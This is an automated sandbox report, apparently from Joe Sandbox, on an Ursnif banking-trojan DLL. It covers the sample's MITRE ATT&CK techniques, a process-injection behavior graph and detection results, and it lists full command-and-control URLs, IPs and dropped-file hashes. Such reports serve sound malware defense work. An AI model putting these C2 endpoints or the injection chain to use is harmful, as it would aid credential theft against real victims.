                      Source: Yara matchFile source: 00000000.00000002.821862720.0000000001349000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.488168081.0000000002F70000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.750652443.0000000005039000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.524931430.0000000004A79000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.457623668.0000000003000000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.456819132.0000000000690000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.491371934.00000000006A0000.00000040.00000001.sdmp, type: MEMORY

                      Mitre Att&ck Matrix

                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                      Valid AccountsWindows Management Instrumentation2DLL Side-Loading1DLL Side-Loading1Obfuscated Files or Information1Credential API Hooking3System Time Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumIngress Tool Transfer3Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                      Default AccountsNative API1Boot or Logon Initialization ScriptsProcess Injection813DLL Side-Loading1LSASS MemoryAccount Discovery1Remote Desktop ProtocolEmail Collection1Exfiltration Over BluetoothEncrypted Channel11Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                      Domain AccountsCommand and Scripting Interpreter1Logon Script (Windows)Logon Script (Windows)File Deletion1Security Account ManagerFile and Directory Discovery3SMB/Windows Admin SharesCredential API Hooking3Automated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                      Local AccountsPowerShell1Logon Script (Mac)Logon Script (Mac)Rootkit4NTDSSystem Information Discovery25Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol14SIM Card SwapCarrier Billing Fraud
                      Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptMasquerading1LSA SecretsSecurity Software Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                      Replication Through Removable MediaLaunchdRc.commonRc.commonVirtualization/Sandbox Evasion21Cached Domain CredentialsVirtualization/Sandbox Evasion21VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                      External Remote ServicesScheduled TaskStartup ItemsStartup ItemsProcess Injection813DCSyncProcess Discovery3Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobRundll321Proc FilesystemApplication Window Discovery1Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                      Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Masquerading/etc/passwd and /etc/shadowSystem Owner/User Discovery1Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                      Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Invalid Code SignatureNetwork SniffingRemote System Discovery11Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
                      Compromise Software Dependencies and Development ToolsWindows Command ShellCronCronRight-to-Left OverrideInput CaptureSystem Network Configuration Discovery1Replication Through Removable MediaRemote Data StagingExfiltration Over Physical MediumMail ProtocolsService Stop

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 signatures2 2 Behavior Graph ID: 499264 Sample: uT9rwkGATJ.dll Startdate: 08/10/2021 Architecture: WINDOWS Score: 100 104 Found malware configuration 2->104 106 Sigma detected: Powershell run code from registry 2->106 108 Yara detected  Ursnif 2->108 110 9 other signatures 2->110 9 mshta.exe 19 2->9         started        12 loaddll32.exe 1 1 2->12         started        15 mshta.exe 2->15         started        process3 dnsIp4 130 Suspicious powershell command line found 9->130 17 powershell.exe 30 9->17         started        98 outlook.com 40.97.156.114, 443, 49754 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 12->98 100 HHN-efz.ms-acdc.office.com 52.97.151.18, 443, 49756 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 12->100 102 7 other IPs or domains 12->102 132 Writes to foreign memory regions 12->132 134 Writes or reads registry keys via WMI 12->134 136 Writes registry values via WMI 12->136 21 cmd.exe 1 12->21         started        23 rundll32.exe 12->23         started        25 control.exe 12->25         started        29 2 other processes 12->29 27 powershell.exe 15->27         started        signatures5 process6 file7 80 C:\Users\user\AppData\...\uio4qdnj.cmdline, UTF-8 17->80 dropped 112 Injects code into the Windows Explorer (explorer.exe) 17->112 114 Writes to foreign memory regions 17->114 116 Modifies the context of a thread in another process (thread injection) 17->116 31 explorer.exe 17->31 injected 34 csc.exe 17->34         started        37 csc.exe 17->37         started        39 conhost.exe 17->39         started        41 rundll32.exe 21->41         started        118 System process connects to network (likely due to code injection or exploit) 23->118 120 Writes registry values via WMI 23->120 44 rundll32.exe 25->44         started        122 Maps a DLL or memory area into another process 27->122 124 Creates a thread in another existing process (thread injection) 27->124 46 csc.exe 27->46         started        48 csc.exe 27->48         started        50 conhost.exe 27->50         started        signatures8 process9 dnsIp10 138 Changes memory attributes in foreign processes to executable or writable 31->138 140 Self deletion via cmd delete 31->140 142 Writes to foreign memory regions 31->142 146 5 other signatures 31->146 52 cmd.exe 31->52         started        55 cmd.exe 31->55         started        57 RuntimeBroker.exe 31->57 injected 82 C:\Users\user\AppData\Local\...\uio4qdnj.dll, PE32 34->82 dropped 59 cvtres.exe 34->59         started        84 C:\Users\user\AppData\Local\...\hjljqxud.dll, PE32 37->84 dropped 61 cvtres.exe 37->61         started        90 40.101.9.178, 443, 49765 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 41->90 92 40.97.160.2, 443, 49764 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 41->92 94 10 other IPs or domains 41->94 144 System process connects to network (likely due to code injection or exploit) 41->144 63 control.exe 41->63         started        86 C:\Users\user\AppData\Local\...\hiiw3gsl.dll, PE32 46->86 dropped 65 cvtres.exe 46->65         started        88 C:\Users\user\AppData\Local\...\ebytp2em.dll, PE32 48->88 dropped 67 cvtres.exe 48->67         started        file11 signatures12 process13 signatures14 126 Uses ping.exe to sleep 52->126 128 Uses ping.exe to check the status of other devices and networks 52->128 69 conhost.exe 52->69         started        71 PING.EXE 52->71         started        73 PING.EXE 55->73         started        76 conhost.exe 55->76         started        78 rundll32.exe 63->78         started        process15 dnsIp16 96 192.168.2.1 unknown unknown 73->96

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      uT9rwkGATJ.dll100%Joe Sandbox ML

                      Dropped Files

                      No Antivirus matches

                      Unpacked PE Files

                      SourceDetectionScannerLabelLinkDownload
                      0.2.loaddll32.exe.b00000.0.unpack100%AviraHEUR/AGEN.1108168Download File
                      3.2.rundll32.exe.3020000.0.unpack100%AviraHEUR/AGEN.1108168Download File
                      4.2.rundll32.exe.2bd0000.0.unpack100%AviraHEUR/AGEN.1108168Download File

                      Domains

                      No Antivirus matches

                      URLs

                      SourceDetectionScannerLabelLink
                      https://xereunrtol.website/pojol/Iy4aVVVv_2F5p3ISq/KmA4kE4MsjC2/O0neobTDOGW/zQHPZSL_2FkiUS/WZkQDHN_2BO0wsYuYQ60c/ykD9m58yrwFA_2Fc/7Q0DjKK2XYcw7wO/NMi_2BPmiK_2FGgoaB/sAJyJXEyx/kvg73rm0ZZUQwsWRe8jH/1VJfDP67eM6_2FlNyHx/2gb4jMnS4FBhM1k7othvDH/rOcbuo_2B/liSzQ.jop0%Avira URL Cloudsafe
                      https://xereunrtol.website/pojol/W4QiDRChG_/2BVblDFptU_2BRt86/bDQ28Atm7UJp/hMrJ18dixaJ/Ehvso7jB6b1A7n/fuEtfFyRY6z_2FVw8s1t6/enfrMlaYNyygktry/YNTHSHxjijP0_2B/G7FZq6LMuf5Bf2R30l/ih28AE5GN/brwux6ZnrceibZm2b3Bl/W4v_2BEcLNfhDC9uqG8/mC3B1bUhAB/QJIQRA6ic/2.jop0%Avira URL Cloudsafe
                      http://constitution.org/usdeclar.txt0%URL Reputationsafe
                      http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
                      https://contoso.com/0%URL Reputationsafe
                      https://xereunrtol.website/pojol/pfDJgBAB44HEkaaE/IAkYjQDoenC7dCc/knaeZ_2Bc4niJWZDoT/92La9yVP8/Nm_2F8vIouJQNUgCe_2B/Wv7KOG1Nz3mjOa0l_2F/OnBpy4GwhZX8qV0mLK2Wlc/FREIwqk_2Fjl_/2BOUAmEa/t8HTP1o0pL0qYjqL1hIxYFo/1EnpJwv2G5/SCJcrEDAQ0UY_2FXk/piB_2BjH/Biqze_2FNrj/O.jop0%Avira URL Cloudsafe
                      http://constitution.org/usdeclar.txtC:0%URL Reputationsafe
                      https://contoso.com/License0%URL Reputationsafe
                      https://contoso.com/Icon0%URL Reputationsafe
                      http://https://file://USER.ID%lu.exe/upd0%Avira URL Cloudsafe
                      https://xereunrtol.website/pojol/ad8SMO3QEV/WpK2KWVlzISPCUWri/sHIqFx0L8nEL/d6DW60Wq7Sc/nktLUA8MXJku9L/Zmk6jUfJynHeMmB_2FY4b/Civyvu50LYW7nG6R/vXmd0MgFzqo2GgW/fQxwYw_2BGvLQBdwxJ/0lhkdnAJr/xh_2Fs6N3R0PcVVrZUsT/V_2FUDCTlH6Z32G0s2B/iaQ6r5gLvcevP7/0Gv8.jop0%Avira URL Cloudsafe
                      https://xereunrtol.website/pojol/Erqz_2Bjz7wow49Bn/_2FYIkv6TVHF/sf1rwNiJ2Y3/yJrhJeNnU2kEjh/nuALEqJJJFMSq4HklSS5m/2rTPjjO5rg9u1lJM/jSBd70o6b_2FFTD/X_2BcSxW23GpW45bdz/qP6WaBi3l/T0VhC50JfgPQOKEf4_2B/z0gbHb1bA3R_2Bj9ls7/dy0ZwparSRsDS8LsskC3_2/FFWZkjDnU/Jgk.jop0%Avira URL Cloudsafe

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      outlook.com
                      		40.97.156.114
                      		truefalse
                        		high
                        HHN-efz.ms-acdc.office.com
                        		52.97.151.18
                        		truefalse
                          		high
                          FRA-efz.ms-acdc.office.com
                          		52.98.208.114
                          		truefalse
                            		high
                            xereunrtol.website
                            		193.29.104.83
                            		truefalse
                              		high
                              www.outlook.com
                              		unknown
                              		unknownfalse
                                		high
                                zereunrtol.website
                                		unknown
                                		unknownfalse
                                  		high
                                  outlook.office365.com
                                  		unknown
                                  		unknownfalse
                                    		high

                                    Contacted URLs

                                    NameMaliciousAntivirus DetectionReputation
                                    https://xereunrtol.website/pojol/Iy4aVVVv_2F5p3ISq/KmA4kE4MsjC2/O0neobTDOGW/zQHPZSL_2FkiUS/WZkQDHN_2BO0wsYuYQ60c/ykD9m58yrwFA_2Fc/7Q0DjKK2XYcw7wO/NMi_2BPmiK_2FGgoaB/sAJyJXEyx/kvg73rm0ZZUQwsWRe8jH/1VJfDP67eM6_2FlNyHx/2gb4jMnS4FBhM1k7othvDH/rOcbuo_2B/liSzQ.joptrue
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://xereunrtol.website/pojol/W4QiDRChG_/2BVblDFptU_2BRt86/bDQ28Atm7UJp/hMrJ18dixaJ/Ehvso7jB6b1A7n/fuEtfFyRY6z_2FVw8s1t6/enfrMlaYNyygktry/YNTHSHxjijP0_2B/G7FZq6LMuf5Bf2R30l/ih28AE5GN/brwux6ZnrceibZm2b3Bl/W4v_2BEcLNfhDC9uqG8/mC3B1bUhAB/QJIQRA6ic/2.joptrue
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://www.outlook.com/pojol/xkXyR8LKA/eI1evutWYClFQ4W7hwct/llxVsyUgZqM6TRxf7bd/2z3_2BxCgTSZ4eiQRk7_2B/xhR9ASIByVYd5/k9IZWWUd/sbd5P5Eg3X7dqsFpKCJyTDt/IAd_2BtulH/3wtBmsW6X6ginLnLB/VmVEduvxIp7D/zWV8_2BxG6O/L9p9ON1U8Ev0PL/rZEhbsLNtjIw0seImBfEo/iFBYVWe9s_2F7XNI/16GpD45T/z.jopfalse
                                      		high
                                      https://outlook.office365.com/pojol/tCbStZih9zBgw/PK5_2Fka/RdFSp7I7gIKF19Vo1xqIyOu/SHII9uTh4N/i16rSjNs5tk21XBNr/NN0e7MSF4abs/8Os7EFjy2AT/q_2FOByNu3Pktw/XcuCHxUTtQcQX6H9c5T92/Qi_2FpIg3IGciw_2/F7QY5uWmpwUhM_2/FrlZq3Dbrg_2F9dk41/aJHeuYWTN/Hb_2BgqqgGBMS_2FKc/A3Y.jopfalse
                                        		high
                                        https://xereunrtol.website/pojol/pfDJgBAB44HEkaaE/IAkYjQDoenC7dCc/knaeZ_2Bc4niJWZDoT/92La9yVP8/Nm_2F8vIouJQNUgCe_2B/Wv7KOG1Nz3mjOa0l_2F/OnBpy4GwhZX8qV0mLK2Wlc/FREIwqk_2Fjl_/2BOUAmEa/t8HTP1o0pL0qYjqL1hIxYFo/1EnpJwv2G5/SCJcrEDAQ0UY_2FXk/piB_2BjH/Biqze_2FNrj/O.joptrue
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://outlook.com/pojol/xkXyR8LKA/eI1evutWYClFQ4W7hwct/llxVsyUgZqM6TRxf7bd/2z3_2BxCgTSZ4eiQRk7_2B/xhR9ASIByVYd5/k9IZWWUd/sbd5P5Eg3X7dqsFpKCJyTDt/IAd_2BtulH/3wtBmsW6X6ginLnLB/VmVEduvxIp7D/zWV8_2BxG6O/L9p9ON1U8Ev0PL/rZEhbsLNtjIw0seImBfEo/iFBYVWe9s_2F7XNI/16GpD45T/z.jopfalse
                                          		high
                                          https://outlook.com/pojol/tCbStZih9zBgw/PK5_2Fka/RdFSp7I7gIKF19Vo1xqIyOu/SHII9uTh4N/i16rSjNs5tk21XBNr/NN0e7MSF4abs/8Os7EFjy2AT/q_2FOByNu3Pktw/XcuCHxUTtQcQX6H9c5T92/Qi_2FpIg3IGciw_2/F7QY5uWmpwUhM_2/FrlZq3Dbrg_2F9dk41/aJHeuYWTN/Hb_2BgqqgGBMS_2FKc/A3Y.jopfalse
                                            		high
                                            https://xereunrtol.website/pojol/ad8SMO3QEV/WpK2KWVlzISPCUWri/sHIqFx0L8nEL/d6DW60Wq7Sc/nktLUA8MXJku9L/Zmk6jUfJynHeMmB_2FY4b/Civyvu50LYW7nG6R/vXmd0MgFzqo2GgW/fQxwYw_2BGvLQBdwxJ/0lhkdnAJr/xh_2Fs6N3R0PcVVrZUsT/V_2FUDCTlH6Z32G0s2B/iaQ6r5gLvcevP7/0Gv8.joptrue
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://outlook.office365.com/pojol/xkXyR8LKA/eI1evutWYClFQ4W7hwct/llxVsyUgZqM6TRxf7bd/2z3_2BxCgTSZ4eiQRk7_2B/xhR9ASIByVYd5/k9IZWWUd/sbd5P5Eg3X7dqsFpKCJyTDt/IAd_2BtulH/3wtBmsW6X6ginLnLB/VmVEduvxIp7D/zWV8_2BxG6O/L9p9ON1U8Ev0PL/rZEhbsLNtjIw0seImBfEo/iFBYVWe9s_2F7XNI/16GpD45T/z.jopfalse
                                              		high
                                              https://xereunrtol.website/pojol/Erqz_2Bjz7wow49Bn/_2FYIkv6TVHF/sf1rwNiJ2Y3/yJrhJeNnU2kEjh/nuALEqJJJFMSq4HklSS5m/2rTPjjO5rg9u1lJM/jSBd70o6b_2FFTD/X_2BcSxW23GpW45bdz/qP6WaBi3l/T0VhC50JfgPQOKEf4_2B/z0gbHb1bA3R_2Bj9ls7/dy0ZwparSRsDS8LsskC3_2/FFWZkjDnU/Jgk.joptrue
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://www.outlook.com/pojol/tCbStZih9zBgw/PK5_2Fka/RdFSp7I7gIKF19Vo1xqIyOu/SHII9uTh4N/i16rSjNs5tk21XBNr/NN0e7MSF4abs/8Os7EFjy2AT/q_2FOByNu3Pktw/XcuCHxUTtQcQX6H9c5T92/Qi_2FpIg3IGciw_2/F7QY5uWmpwUhM_2/FrlZq3Dbrg_2F9dk41/aJHeuYWTN/Hb_2BgqqgGBMS_2FKc/A3Y.jopfalse
                                                		high

                                                URLs from Memory and Binaries

                                                NameSourceMaliciousAntivirus DetectionReputation
                                                http://nuget.org/NuGet.exepowershell.exe, 00000017.00000002.811226428.0000026CB6371000.00000004.00000001.sdmp, powershell.exe, 0000001B.00000002.815218185.0000029710062000.00000004.00000001.sdmpfalse
                                                  		high
                                                  http://constitution.org/usdeclar.txtloaddll32.exe, 00000000.00000003.678884329.0000000004348000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.689152229.0000000006448000.00000004.00000040.sdmp, explorer.exe, 00000027.00000000.762429648.00000000102CC000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000031.00000002.822485950.000001B91FF02000.00000004.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://pesterbdd.com/images/Pester.pngpowershell.exe, 0000001B.00000002.771001840.0000029700209000.00000004.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 0000001B.00000002.771001840.0000029700209000.00000004.00000001.sdmpfalse
                                                    		high
                                                    https://contoso.com/powershell.exe, 0000001B.00000002.815218185.0000029710062000.00000004.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    https://nuget.org/nuget.exepowershell.exe, 00000017.00000002.811226428.0000026CB6371000.00000004.00000001.sdmp, powershell.exe, 0000001B.00000002.815218185.0000029710062000.00000004.00000001.sdmpfalse
                                                      		high
                                                      http://constitution.org/usdeclar.txtC:loaddll32.exe, 00000000.00000003.678884329.0000000004348000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.689152229.0000000006448000.00000004.00000040.sdmp, explorer.exe, 00000027.00000000.762429648.00000000102CC000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000031.00000002.822485950.000001B91FF02000.00000004.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      https://contoso.com/Licensepowershell.exe, 0000001B.00000002.815218185.0000029710062000.00000004.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      https://contoso.com/Iconpowershell.exe, 0000001B.00000002.815218185.0000029710062000.00000004.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      http://https://file://USER.ID%lu.exe/updloaddll32.exe, 00000000.00000003.678884329.0000000004348000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.689152229.0000000006448000.00000004.00000040.sdmp, explorer.exe, 00000027.00000000.762429648.00000000102CC000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000031.00000002.822485950.000001B91FF02000.00000004.00000001.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		low
                                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000017.00000002.761980707.0000026CA6311000.00000004.00000001.sdmp, powershell.exe, 0000001B.00000002.770495881.0000029700001000.00000004.00000001.sdmpfalse
                                                        		high
                                                        https://github.com/Pester/Pesterpowershell.exe, 0000001B.00000002.771001840.0000029700209000.00000004.00000001.sdmpfalse
                                                          		high

                                                          Contacted IPs

                                                          • No. of IPs < 25%
                                                          • 25% < No. of IPs < 50%
                                                          • 50% < No. of IPs < 75%
                                                          • 75% < No. of IPs

                                                          Public

                                                          IPDomainCountryFlagASNASN NameMalicious
                                                          40.97.156.114
                                                          		outlook.comUnited States
                                                          		8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                          52.97.178.98
                                                          		unknownUnited States
                                                          		8075MICROSOFT-CORP-MSN-AS-BLOCKUStrue
                                                          193.29.104.83
                                                          		xereunrtol.websiteRomania
                                                          		9009M247GBfalse
                                                          52.97.151.18
                                                          		HHN-efz.ms-acdc.office.comUnited States
                                                          		8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                          40.97.160.2
                                                          		unknownUnited States
                                                          		8075MICROSOFT-CORP-MSN-AS-BLOCKUStrue
                                                          40.101.9.178
                                                          		unknownUnited States
                                                          		8075MICROSOFT-CORP-MSN-AS-BLOCKUStrue
                                                          52.98.208.114
                                                          		FRA-efz.ms-acdc.office.comUnited States
                                                          		8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse

                                                          Private

                                                          IP
                                                          192.168.2.1

                                                          General Information

                                                          Joe Sandbox Version:33.0.0 White Diamond
                                                          Analysis ID:499264
                                                          Start date:08.10.2021
                                                          Start time:06:42:36
                                                          Joe Sandbox Product:CloudBasic
                                                          Overall analysis duration:0h 15m 41s
                                                          Hypervisor based Inspection enabled:false
                                                          Report type:light
                                                          Sample file name:uT9rwkGATJ.dll
                                                          Cookbook file name:default.jbs
                                                          Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                          Number of analysed new started processes analysed:48
                                                          Number of new started drivers analysed:0
                                                          Number of existing processes analysed:0
                                                          Number of existing drivers analysed:0
                                                          Number of injected processes analysed:0
                                                          Technologies:
                                                          • HCA enabled
                                                          • EGA enabled
                                                          • HDC enabled
                                                          • AMSI enabled
                                                          Analysis Mode:default
                                                          Analysis stop reason:Timeout
                                                          Detection:MAL
                                                          Classification:mal100.bank.troj.evad.winDLL@54/38@14/8
                                                          EGA Information:Failed
                                                          HDC Information:
                                                          • Successful, ratio: 41.9% (good quality ratio 40.3%)
                                                          • Quality average: 79.7%
                                                          • Quality standard deviation: 27.9%
                                                          HCA Information:
                                                          • Successful, ratio: 94%
                                                          • Number of executed functions: 0
                                                          • Number of non-executed functions: 0
                                                          Cookbook Comments:
                                                          • Adjust boot time
                                                          • Enable AMSI
                                                          • Found application associated with file extension: .dll
                                                          • Override analysis time to 240s for rundll32
                                                          Warnings:
                                                          Show All
                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, WmiPrvSE.exe, svchost.exe, wuapihost.exe
                                                          • TCP Packets have been reduced to 100
                                                          • Excluded IPs from analysis (whitelisted): 95.100.218.79, 2.20.178.56, 2.20.178.10, 20.199.120.182, 20.199.120.151, 20.82.209.183, 2.20.178.24, 2.20.178.33, 20.54.110.249, 40.112.88.60, 52.251.79.25, 20.199.120.85, 20.50.102.62
                                                          • Excluded domains from analysis (whitelisted): consumer-displaycatalogrp-aks2aks-useast.md.mp.microsoft.com.akadns.net, store-images.s-microsoft.com-c.edgekey.net, a767.dspw65.akamai.net, a1449.dscg2.akamai.net, arc.msn.com, e12564.dspb.akamaiedge.net, wns.notify.trafficmanager.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, client.wns.windows.com, iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, wu-shim.trafficmanager.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, eus2-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ctldl.windowsupdate.com, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, download.windowsupdate.com.edgesuite.net, ris.api.iris.microsoft.com, store-images.s-microsoft.com, displaycatalog-rp-useast.md.mp.microsoft.com.akadns.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                                          • Not all processes where analyzed, report is missing behavior information
                                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                          • Report size getting too big, too many NtReadVirtualMemory calls found.

                                                          Simulations

                                                          Behavior and APIs

                                                          TimeTypeDescription
                                                          06:45:09API Interceptor7x Sleep call for process: rundll32.exe modified
                                                          06:45:14API Interceptor6x Sleep call for process: loaddll32.exe modified
                                                          06:46:19API Interceptor121x Sleep call for process: powershell.exe modified

                                                          Joe Sandbox View / Context

                                                          IPs

                                                          No context

                                                          Domains

                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                          outlook.comvhPaw5lCuv.exeGet hashmaliciousBrowse
                                                          • 40.93.212.0
                                                          5sTWnI5RoC.exeGet hashmaliciousBrowse
                                                          • 40.93.207.0
                                                          57wF9hu0V5.exeGet hashmaliciousBrowse
                                                          • 40.93.207.0
                                                          7zxmUw3Ml1.exeGet hashmaliciousBrowse
                                                          • 104.47.53.36
                                                          Nh1UI4PFGW.exeGet hashmaliciousBrowse
                                                          • 52.101.24.0
                                                          rEYF2xcbGR.exeGet hashmaliciousBrowse
                                                          • 40.93.207.1
                                                          G2Shy4flZe.exeGet hashmaliciousBrowse
                                                          • 40.93.207.1
                                                          2nqVnWlyLp.exeGet hashmaliciousBrowse
                                                          • 52.101.24.0
                                                          nFkQ33d7Ec.exeGet hashmaliciousBrowse
                                                          • 104.47.53.36
                                                          QE66HWdeTM.exeGet hashmaliciousBrowse
                                                          • 40.93.207.0
                                                          2H69p1kjC4.exeGet hashmaliciousBrowse
                                                          • 40.93.207.1
                                                          SEYpTxOaaR.exeGet hashmaliciousBrowse
                                                          • 104.47.53.36
                                                          fxXx5zeMoZ.exeGet hashmaliciousBrowse
                                                          • 104.47.53.36
                                                          CcXHF1vwBV.exeGet hashmaliciousBrowse
                                                          • 40.93.207.1
                                                          dBqfgL7GXS.exeGet hashmaliciousBrowse
                                                          • 52.101.24.0
                                                          5noOquwN1Y.exeGet hashmaliciousBrowse
                                                          • 40.93.212.0
                                                          4n7IhmzVJs.exeGet hashmaliciousBrowse
                                                          • 52.101.24.0
                                                          rhmBIBtY1G.exeGet hashmaliciousBrowse
                                                          • 52.101.24.0
                                                          pKnzTBUS7B.exeGet hashmaliciousBrowse
                                                          • 40.93.207.0
                                                          37ZvWVwdgn.exeGet hashmaliciousBrowse
                                                          • 104.47.53.36

                                                          ASN

                                                          No context

                                                          JA3 Fingerprints

                                                          No context

                                                          Dropped Files

                                                          No context

                                                          Created / dropped Files

                                                          C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):11606
                                                          Entropy (8bit):4.883977562702998
                                                          Encrypted:false
                                                          SSDEEP:192:Axoe5FpOMxoe5Pib4GVsm5emdKVFn3eGOVpN6K3bkkjo5HgkjDt4iWN3yBGHh9sO:6fib4GGVoGIpN6KQkj2Akjh4iUxs14fr
                                                          MD5:1F1446CE05A385817C3EF20CBD8B6E6A
                                                          SHA1:1E4B1EE5EFCA361C9FB5DC286DD7A99DEA31F33D
                                                          SHA-256:2BCEC12B7B67668569124FED0E0CEF2C1505B742F7AE2CF86C8544D07D59F2CE
                                                          SHA-512:252AD962C0E8023419D756A11F0DDF2622F71CBC9DAE31DC14D9C400607DF43030E90BCFBF2EE9B89782CC952E8FB2DADD7BDBBA3D31E33DA5A589A76B87C514
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: PSMODULECACHE......P.e...S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........7r8...C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af
                                                          C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):64
                                                          Entropy (8bit):0.9260988789684415
                                                          Encrypted:false
                                                          SSDEEP:3:Nlllulb/lj:NllUb/l
                                                          MD5:13AF6BE1CB30E2FB779EA728EE0A6D67
                                                          SHA1:F33581AC2C60B1F02C978D14DC220DCE57CC9562
